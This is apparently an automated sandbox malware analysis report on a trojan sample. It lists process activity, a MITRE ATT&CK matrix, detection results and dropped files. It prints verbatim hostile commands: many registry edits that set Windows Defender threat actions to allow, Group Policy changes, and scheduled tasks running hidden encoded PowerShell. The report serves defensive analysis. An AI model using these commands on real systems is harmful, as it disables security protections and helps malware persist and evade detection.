Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParamJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414B04 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,0_2_00414B04

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Modifies Group Policy settings
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeFile written: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation		11
Scheduled Task/Job		11
Process Injection		2
Masquerading		1
Input Capture		131
Security Software Discovery		Remote Services1
Input Capture		Exfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts21
Command and Scripting Interpreter		Boot or Logon Initialization Scripts11
Scheduled Task/Job		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Archive Collected Data		Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts11
Scheduled Task/Job		Logon Script (Windows)Logon Script (Windows)1
Modify Registry		Security Account Manager41
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
Native API		Logon Script (Mac)Logon Script (Mac)41
Virtualization/Sandbox Evasion		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud Accounts2
PowerShell		Network Logon ScriptNetwork Logon Script11
Process Injection		LSA Secrets4
File and Directory Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common11
Deobfuscate/Decode Files or Information		Cached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items2
Obfuscated Files or Information		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
File Deletion		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 776315 Sample: file.exe Startdate: 31/12/2022 Architecture: WINDOWS Score: 88 87 Antivirus detection for dropped file 2->87 89 Multi AV Scanner detection for dropped file 2->89 91 Sigma detected: Schedule system process 2->91 93 2 other signatures 2->93 10 file.exe 7 2->10         started        13 KZDOWch.exe 1 8 2->13         started        16 powershell.exe 12 2->16         started        process3 file4 79 C:\Users\user\AppData\Local\...\Install.exe, PE32 10->79 dropped 18 Install.exe 4 10->18         started        81 C:\Windows\Temp\...\YLNoErO.exe, PE32 13->81 dropped 99 Antivirus detection for dropped file 13->99 101 Multi AV Scanner detection for dropped file 13->101 103 Very long command line found 13->103 21 powershell.exe 9 13->21         started        24 gpupdate.exe 1 16->24         started        26 conhost.exe 16->26         started        signatures5 process6 file7 77 C:\Users\user\AppData\Local\...\Install.exe, PE32 18->77 dropped 28 Install.exe 10 18->28         started        97 Uses cmd line tools excessively to alter registry or file data 21->97 32 cmd.exe 21->32         started        34 conhost.exe 21->34         started        36 gpscript.exe 21->36         started        40 20 other processes 21->40 38 conhost.exe 24->38         started        signatures8 process9 file10 83 C:\Users\user\AppData\Local\...\KZDOWch.exe, PE32 28->83 dropped 85 C:\Windows\System32behaviorgraphroupPolicy\gpt.ini, ASCII 28->85 dropped 105 Antivirus detection for dropped file 28->105 107 Multi AV Scanner detection for dropped file 28->107 109 Uses schtasks.exe or at.exe to add and modify task schedules 28->109 111 Modifies Group Policy settings 28->111 42 forfiles.exe 1 28->42         started        44 forfiles.exe 1 28->44         started        46 schtasks.exe 2 28->46         started        50 3 other processes 28->50 113 Uses cmd line tools excessively to alter registry or file data 32->113 48 reg.exe 32->48         started        signatures11 process12 process13 52 cmd.exe 1 42->52         started        55 conhost.exe 42->55         started        57 cmd.exe 1 44->57         started        59 conhost.exe 44->59         started        61 conhost.exe 46->61         started        63 conhost.exe 50->63         started        65 conhost.exe 50->65         started        67 conhost.exe 50->67         started        signatures14 95 Uses cmd line tools excessively to alter registry or file data 52->95 69 reg.exe 1 1 52->69         started        71 reg.exe 1 52->71         started        73 reg.exe 1 1 57->73         started        75 reg.exe 1 57->75         started        process15

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe100%AviraHEUR/AGEN.1250601
C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe100%AviraHEUR/AGEN.1250601
C:\Windows\Temp\CTQYLaFGBwgBLVnC\XOWTqVpevqJTLBZ\YLNoErO.exe100%AviraHEUR/AGEN.1250601
C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe65%ReversingLabsWin32.Trojan.Barys
C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe65%ReversingLabsWin32.Trojan.Barys
C:\Windows\Temp\CTQYLaFGBwgBLVnC\XOWTqVpevqJTLBZ\YLNoErO.exe65%ReversingLabsWin32.Trojan.Barys

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
23.0.KZDOWch.exe.df0000.0.unpack100%AviraHEUR/AGEN.1250601Download File
23.2.KZDOWch.exe.df0000.0.unpack100%AviraHEUR/AGEN.1250601Download File
2.2.Install.exe.920000.0.unpack100%AviraHEUR/AGEN.1250601Download File
2.0.Install.exe.920000.0.unpack100%AviraHEUR/AGEN.1250601Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.m0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000011.00000002.418333366.0000020362523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    http://crl.mpowershell.exe, 00000011.00000002.363453678.0000020350765000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.370748414.0000020352583000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.364982026.0000020352381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.431937446.0000000003E01000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.370748414.0000020352583000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.370748414.0000020352583000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://contoso.com/powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://nuget.org/nuget.exepowershell.exe, 00000011.00000002.418333366.0000020362523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://contoso.com/Licensepowershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            No contacted IP infos

            General Information

            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:776315
            Start date and time:2022-12-31 16:10:08 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 51s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:file.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:59
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal88.evad.winEXE@98/15@0/0
            EGA Information:
            • Successful, ratio: 80%
            HDC Information:
            • Successful, ratio: 99% (good quality ratio 96.3%)
            • Quality average: 84.2%
            • Quality standard deviation: 23.4%
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): files.testupdate.info, clients2.google.com, login.live.com, settings-win.data.microsoft.com, api2.check-data.xyz, www.googleapis.com, www.testupdate.info, service-domain.xyz
            • Execution Graph export aborted for target powershell.exe, PID 4040 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: file.exe

            Simulations

            Behavior and APIs

            TimeTypeDescription
            16:11:13API Interceptor1x Sleep call for process: Install.exe modified
            16:11:14Task SchedulerRun new task: goSRLihgj path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
            16:11:19Task SchedulerRun new task: bbrwVHWbINAVAbZleQ path: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe s>UB /site_id 525403 /S
            16:11:25API Interceptor29x Sleep call for process: powershell.exe modified
            16:12:13API Interceptor1x Sleep call for process: KZDOWch.exe modified
            16:12:17Task SchedulerRun new task: uwdxcHIPRMOGjvUXa path: C:\Windows\Temp\CTQYLaFGBwgBLVnC\XOWTqVpevqJTLBZ\YLNoErO.exe s>mT /site_id 525403 /S
            16:12:21Task SchedulerRun new task: dbcGzoJSgXXyj2 path: C:\Windows\system32\wscript.exe s>"C:\ProgramData\DSaNCZvTTJTSDlVB\DndlVYr.wsf"

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            No context

            JA3 Fingerprints

            No context

            Dropped Files

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exefile.exeGet hashmaliciousBrowse
              file.exeGet hashmaliciousBrowse
                file.exeGet hashmaliciousBrowse
                  file.exeGet hashmaliciousBrowse
                    C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exefile.exeGet hashmaliciousBrowse
                      file.exeGet hashmaliciousBrowse
                        file.exeGet hashmaliciousBrowse
                          file.exeGet hashmaliciousBrowse

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1108
                            Entropy (8bit):5.295294468448967
                            Encrypted:false
                            SSDEEP:24:3AkPpQrLAo4KAxX5qRPD42HZSCvKDe9tOBPnKEU:DPerB4nqRL/HZSCv4e9tOBfzU
                            MD5:1C80F1303DD3DDBE3C096705FF52040A
                            SHA1:3741403D56389B4EC7CF855E6C76C6DC2C95FF64
                            SHA-256:42D4B9FA1F3F8EB161A0C58AADA51D2A417CC8B5CCDA334905C62ACC84493F88
                            SHA-512:DC82F25447F671E173D1A7C4D00EAD4C3B1E040D913C7011F3D8A785625D1E26C5982DB8550A63947E996AAF104763C170E070C8BB176ED5EE17115D9DB3AB6C
                            Malicious:false
                            Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins

                            C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exe

                            Download File
                            Process:C:\Users\user\Desktop\file.exe
